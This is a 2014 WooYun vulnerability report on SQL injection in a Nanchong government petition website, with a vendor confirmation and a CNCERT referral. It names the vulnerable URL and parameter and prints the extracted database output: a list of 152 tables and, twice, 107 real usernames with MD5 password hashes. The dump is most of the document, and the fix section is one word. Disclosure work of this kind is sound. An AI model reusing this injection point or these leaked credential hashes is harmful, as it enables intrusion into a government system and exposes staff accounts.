当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-056623

漏洞标题:南充信访门户网存在sql注入漏洞

相关厂商:南充信访门户网

漏洞作者: bitcoin

提交时间:2014-04-11 10:56

修复时间:2014-05-26 10:57

公开时间:2014-05-26 10:57

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-04-11: 细节已通知厂商并且等待厂商处理中
2014-04-16: 厂商已经确认,细节仅向厂商公开
2014-04-26: 细节向核心白帽子及相关领域专家公开
2014-05-06: 细节向普通白帽子公开
2014-05-16: 细节向实习白帽子公开
2014-05-26: 细节向公众公开

简要描述:

南充信访门户网存在sql注入漏洞!

详细说明:

注入点:
http://www.ncxf.gov.cn/search.php?do=search&s=ww&select=%E5%85%A8%E6%96%87%E6%A3%80%E7%B4%A2&imageField.x=24&imageField.y=10
参数s过滤不严,导致注入

1.jpg


Database: ncxf
[152 tables]
+-------------------------+
| count |
| af_article |
| af_attachment |
| af_class |
| af_doc |
| af_doc_log |
| af_doc_reply |
| af_logs |
| af_search |
| af_session |
| af_simplevote |
| af_subsite |
| af_tags |
| af_templates |
| af_usergroup |
| af_userinfo |
| af_view_user |
| article |
| attachment |
| cdb_access |
| cdb_activities |
| cdb_activityapplies |
| cdb_adminactions |
| cdb_admincustom |
| cdb_admingroups |
| cdb_adminnotes |
| cdb_adminsessions |
| cdb_advcaches |
| cdb_advertisements |
| cdb_announcements |
| cdb_attachments |
| cdb_attachpaymentlog |
| cdb_attachtypes |
| cdb_banned |
| cdb_bbcodes |
| cdb_caches |
| cdb_campaigns |
| cdb_creditslog |
| cdb_crons |
| cdb_debateposts |
| cdb_debates |
| cdb_failedlogins |
| cdb_faqs |
| cdb_favorites |
| cdb_forumfields |
| cdb_forumlinks |
| cdb_forumrecommend |
| cdb_forums |
| cdb_imagetypes |
| cdb_invites |
| cdb_itempool |
| cdb_magiclog |
| cdb_magicmarket |
| cdb_magics |
| cdb_medallog |
| cdb_medals |
| cdb_memberfields |
| cdb_membermagics |
| cdb_members |
| cdb_memberspaces |
| cdb_moderators |
| cdb_modworks |
| cdb_myposts |
| cdb_mytasks |
| cdb_mythreads |
| cdb_navs |
| cdb_onlinelist |
| cdb_onlinetime |
| cdb_orders |
| cdb_paymentlog |
| cdb_pluginhooks |
| cdb_plugins |
| cdb_pluginvars |
| cdb_polloptions |
| cdb_polls |
| cdb_posts |
| cdb_profilefields |
| cdb_projects |
| cdb_promotions |
| cdb_ranks |
| cdb_ratelog |
| cdb_regips |
| cdb_relatedthreads |
| cdb_reportlog |
| cdb_request |
| cdb_rewardlog |
| cdb_rsscaches |
| cdb_searchindex |
| cdb_sessions |
| cdb_settings |
| cdb_smilies |
| cdb_spacecaches |
| cdb_stats |
| cdb_statvars |
| cdb_styles |
| cdb_stylevars |
| cdb_subscriptions |
| cdb_tags |
| cdb_tasks |
| cdb_taskvars |
| cdb_templates |
| cdb_threads |
| cdb_threadsmod |
| cdb_threadtags |
| cdb_threadtypes |
| cdb_tradecomments |
| cdb_tradelog |
| cdb_tradeoptionvars |
| cdb_trades |
| cdb_typemodels |
| cdb_typeoptions |
| cdb_typeoptionvars |
| cdb_typevars |
| cdb_uc_admins |
| cdb_uc_applications |
| cdb_uc_badwords |
| cdb_uc_domains |
| cdb_uc_failedlogins |
| cdb_uc_feeds |
| cdb_uc_friends |
| cdb_uc_mailqueue |
| cdb_uc_memberfields |
| cdb_uc_members |
| cdb_uc_mergemembers |
| cdb_uc_newpm |
| cdb_uc_notelist |
| cdb_uc_pms |
| cdb_uc_protectedmembers |
| cdb_uc_settings |
| cdb_uc_sqlcache |
| cdb_uc_tags |
| cdb_uc_vars |
| cdb_usergroups |
| cdb_validating |
| cdb_videos |
| cdb_videotags |
| cdb_virtualforums |
| cdb_warnings |
| cdb_words |
| logs |
| manage_leftmenu |
| notebook |
| purview |
| search |
| settings |
| tags |
| usergroup |
| userinfo |
| vote |
| vote_note |
| vote_thread |
| vote_title |
+-------------------------+

3.jpg


Database: ncxf
Table: userinfo
[107 entries]
+----------+----------------------------------+
| username | password |
+----------+----------------------------------+
| jtj01 | 062f56e5364b8d36342b6decae227b5b |
| jtj02 | 062f56e5364b8d36342b6decae227b5b |
| csnc02 | 0bc7c8dbcff192b75b8494515981da5f |
| csnc01 | 0bc7c8dbcff192b75b8494515981da5f |
| fgj02 | 109749c66043c9014e5fe04ddf9c13c7 |
| fgj01 | 109749c66043c9014e5fe04ddf9c13c7 |
| syjj02 | 12ebf53dbe8838ac7fe3a278b8d37d05 |
| syjj01 | 12ebf53dbe8838ac7fe3a278b8d37d05 |
| jmw02 | 16776cd1de9f7ecc74d7687b082b0bf1 |
| jmw01 | 16776cd1de9f7ecc74d7687b082b0bf1 |
| xxb01 | 17969fa42ed5ada381a54aa86b66397b |
| crj02 | 192025495a6450ab5c0e30d1e93a8315 |
| crj01 | 192025495a6450ab5c0e30d1e93a8315 |
| ssnc02 | 1d21b2687896cf1c0807caaaceb551be |
| ssnc01 | 1d21b2687896cf1c0807caaaceb551be |
| gsj02 | 2b916c4d4b5dcaf1a92237bafadec1af |
| gsj01 | 2b916c4d4b5dcaf1a92237bafadec1af |
| xxb16 | 2ba95f44ad1302a55b15e2bde8f40298 |
| nyj01 | 336f7cc169430af33d4b5130dabab229 |
| xxb22 | 35c9f9cb42f16b871a3b3df349eccd23 |
| kjj01 | 3940d5e117b5248ece4bf5c0c38e16b7 |
| kjj02 | 3940d5e117b5248ece4bf5c0c38e16b7 |
| jyj02 | 3bf3b17782ec9a51ebfe917b08a17285 |
| jyj01 | 3bf3b17782ec9a51ebfe917b08a17285 |
| fzb02 | 3c5ac1fd0eda8cda7de8274112d3dbce |
| sfb01 | 3d3fb095899ac5c785ec867c6731858c |
| rsj01 | 3ee30276811040d6bfc29b428237dff3 |
| rsj02 | 3ee30276811040d6bfc29b428237dff3 |
| hcz01 | 404b97043fe2454d88ee6283f4e64598 |
| hcz02 | 404b97043fe2454d88ee6283f4e64598 |
| jsw01 | 445b524a6c708f5a224f9ed012f9732d |
| jsw02 | 445b524a6c708f5a224f9ed012f9732d |
| dst02 | 4a61c4602aa5f5ebe3c2547434201a7f |
| dst01 | 4a61c4602aa5f5ebe3c2547434201a7f |
| lyj01 | 4c9607d74cc5d2dd23b842a5b2e4d84d |
| lyj02 | 4c9607d74cc5d2dd23b842a5b2e4d84d |
| xxb26 | 50310b6351860c4e271bad5aff1a9164 |
| sfj01 | 50887b2f6acc47cc16f96bf1a223a8af |
| sfj02 | 50887b2f6acc47cc16f96bf1a223a8af |
| gaj02 | 51208ae344d3178b487d51d9e02b696e |
| gaj01 | 51208ae344d3178b487d51d9e02b696e |
| mzhj02 | 571456165d5cd27d5361e90a7e99a270 |
| mzhj01 | 571456165d5cd27d5361e90a7e99a270 |
| whj02 | 577a2fd6d5aa2cba863f500ecf681d9c |
| whj01 | 577a2fd6d5aa2cba863f500ecf681d9c |
| dzb01 | 5ca1435927f796437e28233588b4a9ae |
| dzb02 | 5ca1435927f796437e28233588b4a9ae |
| backwork | 5f64176e5cc4212668d5f13c1ca5af75 |
| czj01 | 62adab3910b404c220287a5a7d7bd587 |
| czj02 | 62adab3910b404c220287a5a7d7bd587 |
| yjj02 | 65294b6f78ef63f4f98145337818be81 |
| yjj01 | 65294b6f78ef63f4f98145337818be81 |
| sfb05 | 698d51a19d8a121ce581499d7b701668 |
| qxj02 | 6dbb13ed7b493797f33adf35574a3853 |
| qxj01 | 6dbb13ed7b493797f33adf35574a3853 |
| xfb02 | 6f5a812c35c6ce9eafa86aa18c834733 |
| ghjsj02 | 74a8b791657e8bdf679e1b8bf3b4e3b2 |
| ghjsj01 | 74a8b791657e8bdf679e1b8bf3b4e3b2 |
| yzj02 | 78c94c4f8b635e41dcd01296df44c3a5 |
| yzj01 | 78c94c4f8b635e41dcd01296df44c3a5 |
| xxb08 | 793ad5b884a3c0ba5d0471f77834ac7a |
| ldbzj02 | 7d8efdc662f7dd86339c46769766336f |
| ldbzj01 | 7d8efdc662f7dd86339c46769766336f |
| govxxb | 81dc9bdb52d04dc20036dbd8313ed055 |
| gjjzx02 | 85afc846d98069c8da033fa8d9907399 |
| gjjzx01 | 85afc846d98069c8da033fa8d9907399 |
| zdb01 | 881654e27f0b965176bbe47ce9a1f8ce |
| zdb02 | 881654e27f0b965176bbe47ce9a1f8ce |
| sfb02 | 96e79218965eb72c92a549dd5a330112 |
| wsj01 | 96eec8ebc2dc968a4df5b841d0a31512 |
| wsj02 | 96eec8ebc2dc968a4df5b841d0a31512 |
| cgj02 | a1d6862fcefb6f3cb996de5586f62521 |
| cgj01 | a1d6862fcefb6f3cb996de5586f62521 |
| xzfwzx01 | a4672f260385cb037c0330bfe16470e2 |
| xzfwzx02 | a4672f260385cb037c0330bfe16470e2 |
| tjj01 | a741f6fb00488727d0b137b07338acbe |
| tjj02 | a741f6fb00488727d0b137b07338acbe |
| zsj02 | ab0b605111ff6663148520c579bbc0b7 |
| zsj01 | ab0b605111ff6663148520c579bbc0b7 |
| fzb01 | abcd44798adc89f02dfb9f54c3e17565 |
| gshj01 | b414b7729aabacb426e06b5cd9d731c0 |
| gshj02 | b414b7729aabacb426e06b5cd9d731c0 |
| rh02 | b6614b439746a19621c5c708f0568a27 |
| rh01 | b6614b439746a19621c5c708f0568a27 |
| fgw02 | b8fd2f09f940424e397e064a16b83b2e |
| fgw01 | b8fd2f09f940424e397e064a16b83b2e |
| wjj01 | bbc066cb7f8f2c2df00c97a2dc3cf44c |
| wjj02 | bbc066cb7f8f2c2df00c97a2dc3cf44c |
| hbj01 | bdaf3074ea17d2e7844b6aa9767b586f |
| hbj02 | bdaf3074ea17d2e7844b6aa9767b586f |
| mzj01 | c33ffb38cb3d2896b0d2e85804a70641 |
| mzj02 | c33ffb38cb3d2896b0d2e85804a70641 |
| dsj02 | c5ec5ecb792ef92a82c5645f51f8ef61 |
| dsj01 | c5ec5ecb792ef92a82c5645f51f8ef61 |
| xfj01 | cad60738775c9ecb0baa2675ea849708 |
| ncwb02 | ce7924cb9a6afb15b5d7236f61344a80 |
| ncwb01 | ce7924cb9a6afb15b5d7236f61344a80 |
| xxb000 | d2ac28c44183a85102204570d4a59cb3 |
| xxb03 | deffbb384e9944ff9cc17ebf45f13994 |
| xxb07 | dfa6796ac98cbc63a6bed792158b7d0d |
| xxb21 | e07231a3740dd3ae46c6896fe6e6f2c9 |
| ncrb02 | e17b99941412102810e9b936ddc8a6f9 |
| ncrb01 | e17b99941412102810e9b936ddc8a6f9 |
| gdj02 | ee9c03a7464ed852936fb0e2ad4b33ff |
| gdj01 | ee9c03a7464ed852936fb0e2ad4b33ff |
| dyj01 | f95b846e2ae029d7e4f60cd64b6488b7 |
| dyj02 | f95b846e2ae029d7e4f60cd64b6488b7 |
+----------+----------------------------------+

漏洞证明:

Database: ncxf
Table: userinfo
[107 entries]
+----------+----------------------------------+
| username | password |
+----------+----------------------------------+
| jtj01 | 062f56e5364b8d36342b6decae227b5b |
| jtj02 | 062f56e5364b8d36342b6decae227b5b |
| csnc02 | 0bc7c8dbcff192b75b8494515981da5f |
| csnc01 | 0bc7c8dbcff192b75b8494515981da5f |
| fgj02 | 109749c66043c9014e5fe04ddf9c13c7 |
| fgj01 | 109749c66043c9014e5fe04ddf9c13c7 |
| syjj02 | 12ebf53dbe8838ac7fe3a278b8d37d05 |
| syjj01 | 12ebf53dbe8838ac7fe3a278b8d37d05 |
| jmw02 | 16776cd1de9f7ecc74d7687b082b0bf1 |
| jmw01 | 16776cd1de9f7ecc74d7687b082b0bf1 |
| xxb01 | 17969fa42ed5ada381a54aa86b66397b |
| crj02 | 192025495a6450ab5c0e30d1e93a8315 |
| crj01 | 192025495a6450ab5c0e30d1e93a8315 |
| ssnc02 | 1d21b2687896cf1c0807caaaceb551be |
| ssnc01 | 1d21b2687896cf1c0807caaaceb551be |
| gsj02 | 2b916c4d4b5dcaf1a92237bafadec1af |
| gsj01 | 2b916c4d4b5dcaf1a92237bafadec1af |
| xxb16 | 2ba95f44ad1302a55b15e2bde8f40298 |
| nyj01 | 336f7cc169430af33d4b5130dabab229 |
| xxb22 | 35c9f9cb42f16b871a3b3df349eccd23 |
| kjj01 | 3940d5e117b5248ece4bf5c0c38e16b7 |
| kjj02 | 3940d5e117b5248ece4bf5c0c38e16b7 |
| jyj02 | 3bf3b17782ec9a51ebfe917b08a17285 |
| jyj01 | 3bf3b17782ec9a51ebfe917b08a17285 |
| fzb02 | 3c5ac1fd0eda8cda7de8274112d3dbce |
| sfb01 | 3d3fb095899ac5c785ec867c6731858c |
| rsj01 | 3ee30276811040d6bfc29b428237dff3 |
| rsj02 | 3ee30276811040d6bfc29b428237dff3 |
| hcz01 | 404b97043fe2454d88ee6283f4e64598 |
| hcz02 | 404b97043fe2454d88ee6283f4e64598 |
| jsw01 | 445b524a6c708f5a224f9ed012f9732d |
| jsw02 | 445b524a6c708f5a224f9ed012f9732d |
| dst02 | 4a61c4602aa5f5ebe3c2547434201a7f |
| dst01 | 4a61c4602aa5f5ebe3c2547434201a7f |
| lyj01 | 4c9607d74cc5d2dd23b842a5b2e4d84d |
| lyj02 | 4c9607d74cc5d2dd23b842a5b2e4d84d |
| xxb26 | 50310b6351860c4e271bad5aff1a9164 |
| sfj01 | 50887b2f6acc47cc16f96bf1a223a8af |
| sfj02 | 50887b2f6acc47cc16f96bf1a223a8af |
| gaj02 | 51208ae344d3178b487d51d9e02b696e |
| gaj01 | 51208ae344d3178b487d51d9e02b696e |
| mzhj02 | 571456165d5cd27d5361e90a7e99a270 |
| mzhj01 | 571456165d5cd27d5361e90a7e99a270 |
| whj02 | 577a2fd6d5aa2cba863f500ecf681d9c |
| whj01 | 577a2fd6d5aa2cba863f500ecf681d9c |
| dzb01 | 5ca1435927f796437e28233588b4a9ae |
| dzb02 | 5ca1435927f796437e28233588b4a9ae |
| backwork | 5f64176e5cc4212668d5f13c1ca5af75 |
| czj01 | 62adab3910b404c220287a5a7d7bd587 |
| czj02 | 62adab3910b404c220287a5a7d7bd587 |
| yjj02 | 65294b6f78ef63f4f98145337818be81 |
| yjj01 | 65294b6f78ef63f4f98145337818be81 |
| sfb05 | 698d51a19d8a121ce581499d7b701668 |
| qxj02 | 6dbb13ed7b493797f33adf35574a3853 |
| qxj01 | 6dbb13ed7b493797f33adf35574a3853 |
| xfb02 | 6f5a812c35c6ce9eafa86aa18c834733 |
| ghjsj02 | 74a8b791657e8bdf679e1b8bf3b4e3b2 |
| ghjsj01 | 74a8b791657e8bdf679e1b8bf3b4e3b2 |
| yzj02 | 78c94c4f8b635e41dcd01296df44c3a5 |
| yzj01 | 78c94c4f8b635e41dcd01296df44c3a5 |
| xxb08 | 793ad5b884a3c0ba5d0471f77834ac7a |
| ldbzj02 | 7d8efdc662f7dd86339c46769766336f |
| ldbzj01 | 7d8efdc662f7dd86339c46769766336f |
| govxxb | 81dc9bdb52d04dc20036dbd8313ed055 |
| gjjzx02 | 85afc846d98069c8da033fa8d9907399 |
| gjjzx01 | 85afc846d98069c8da033fa8d9907399 |
| zdb01 | 881654e27f0b965176bbe47ce9a1f8ce |
| zdb02 | 881654e27f0b965176bbe47ce9a1f8ce |
| sfb02 | 96e79218965eb72c92a549dd5a330112 |
| wsj01 | 96eec8ebc2dc968a4df5b841d0a31512 |
| wsj02 | 96eec8ebc2dc968a4df5b841d0a31512 |
| cgj02 | a1d6862fcefb6f3cb996de5586f62521 |
| cgj01 | a1d6862fcefb6f3cb996de5586f62521 |
| xzfwzx01 | a4672f260385cb037c0330bfe16470e2 |
| xzfwzx02 | a4672f260385cb037c0330bfe16470e2 |
| tjj01 | a741f6fb00488727d0b137b07338acbe |
| tjj02 | a741f6fb00488727d0b137b07338acbe |
| zsj02 | ab0b605111ff6663148520c579bbc0b7 |
| zsj01 | ab0b605111ff6663148520c579bbc0b7 |
| fzb01 | abcd44798adc89f02dfb9f54c3e17565 |
| gshj01 | b414b7729aabacb426e06b5cd9d731c0 |
| gshj02 | b414b7729aabacb426e06b5cd9d731c0 |
| rh02 | b6614b439746a19621c5c708f0568a27 |
| rh01 | b6614b439746a19621c5c708f0568a27 |
| fgw02 | b8fd2f09f940424e397e064a16b83b2e |
| fgw01 | b8fd2f09f940424e397e064a16b83b2e |
| wjj01 | bbc066cb7f8f2c2df00c97a2dc3cf44c |
| wjj02 | bbc066cb7f8f2c2df00c97a2dc3cf44c |
| hbj01 | bdaf3074ea17d2e7844b6aa9767b586f |
| hbj02 | bdaf3074ea17d2e7844b6aa9767b586f |
| mzj01 | c33ffb38cb3d2896b0d2e85804a70641 |
| mzj02 | c33ffb38cb3d2896b0d2e85804a70641 |
| dsj02 | c5ec5ecb792ef92a82c5645f51f8ef61 |
| dsj01 | c5ec5ecb792ef92a82c5645f51f8ef61 |
| xfj01 | cad60738775c9ecb0baa2675ea849708 |
| ncwb02 | ce7924cb9a6afb15b5d7236f61344a80 |
| ncwb01 | ce7924cb9a6afb15b5d7236f61344a80 |
| xxb000 | d2ac28c44183a85102204570d4a59cb3 |
| xxb03 | deffbb384e9944ff9cc17ebf45f13994 |
| xxb07 | dfa6796ac98cbc63a6bed792158b7d0d |
| xxb21 | e07231a3740dd3ae46c6896fe6e6f2c9 |
| ncrb02 | e17b99941412102810e9b936ddc8a6f9 |
| ncrb01 | e17b99941412102810e9b936ddc8a6f9 |
| gdj02 | ee9c03a7464ed852936fb0e2ad4b33ff |
| gdj01 | ee9c03a7464ed852936fb0e2ad4b33ff |
| dyj01 | f95b846e2ae029d7e4f60cd64b6488b7 |
| dyj02 | f95b846e2ae029d7e4f60cd64b6488b7 |
+----------+----------------------------------+

修复方案:

过滤

版权声明:转载请注明来源 bitcoin@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-04-16 09:31

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给四川分中心处置,涉及信息泄露风险,rank 15

最新状态:

暂无